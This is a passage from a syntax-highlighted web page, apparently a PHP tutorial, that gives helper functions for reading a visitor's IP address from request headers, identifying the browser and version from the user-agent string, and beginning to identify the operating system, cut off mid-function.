#89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: 
#89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_X_FORWARDED_FOR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_CLIENT_IP</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">])</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_CLIENT_IP</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">])</span><span style="color: 
#BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">HTTP_SERVER_VARS</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_X_FORWARDED_FOR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_X_FORWARDED_FOR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_CLIENT_IP</span><span style="color: 
#89DDFF">"</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">HTTP_CLIENT_IP</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">getenv</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">REMOTE_ADDR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip </span><span style="color: #89DDFF">=</span><span 
style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Unknown</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ip</span><span style="color: #89DDFF">;</span></span></code></pre></div><h4 id="PHP获取客户端(浏览器)信息函数"><a href="#PHP获取客户端(浏览器)信息函数" class="headerlink" title="PHP获取客户端(浏览器)信息函数"></a>PHP获取客户端(浏览器)信息函数</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">get_broswer</span><span style="color: #89DDFF">()</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HTTP_USER_AGENT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//获取用户代理字符串 </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span 
style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Firefox/</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">Firefox\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">^;)</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">+/i"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">b</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Firefox</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: 
#BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">b</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//获取火狐浏览器的版本号 </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Maxthon</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">Maxthon\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span 
style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">aoyou</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">傲游</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">aoyou</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">MSIE</span><span style="color: #89DDFF">"</span><span style="color: 
#89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">MSIE\s</span><span style="color: #89DDFF">+</span><span style="color: #C3E88D">(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">^;)</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">+/i"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ie</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">IE</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: 
#BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ie</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//获取IE的版本号 </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">OPR</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">OPR\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: 
#BABED8">opera</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Opera</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">opera</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Edge</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: 
#89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF"> </span><span style="color: #676E95; font-style: italic">//the Win10 Edge browser adds a Chrome engine marker, so match it before checking for Chrome </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">Edge\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">Edge</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Edge</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span 
style="color: #89DDFF">$</span><span style="color: #BABED8">Edge</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Chrome</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">Chrome\/(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">google</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> 
</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Chrome</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">google</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">//get the Google Chrome version number </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">elseif</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">rv:</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)></span><span style="color: #F78C6C">0</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">stripos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">sys</span><span style="color: 
#89DDFF">,</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Gecko</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)></span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">){</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"/</span><span style="color: #C3E88D">rv:(</span><span style="color: #89DDFF">[</span><span style="color: #C3E88D">\d\.</span><span style="color: #89DDFF">]+</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">/"</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">sys</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">IE</span><span style="color: #89DDFF">);</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">IE</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: 
#89DDFF">$</span><span style="color: #BABED8">IE</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">];</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">未知浏览器</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">""</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">return</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">]</span><span 
style="color: #89DDFF">.'</span><span style="color: #C3E88D">(</span><span style="color: #89DDFF">'.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">exp</span><span style="color: #89DDFF">[</span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">]</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">)</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div><h4 id="获取客户端系统信息"><a href="#获取客户端系统信息" class="headerlink" title="获取客户端系统信息"></a>Get client operating system information</h4><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">get_os</span><span style="color: #89DDFF">()</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_SERVER</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HTTP_USER_AGENT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">false;</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: 
italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">strpos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">95</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 95</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win 9x</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span 
style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">strpos</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">4.90</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows ME</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: 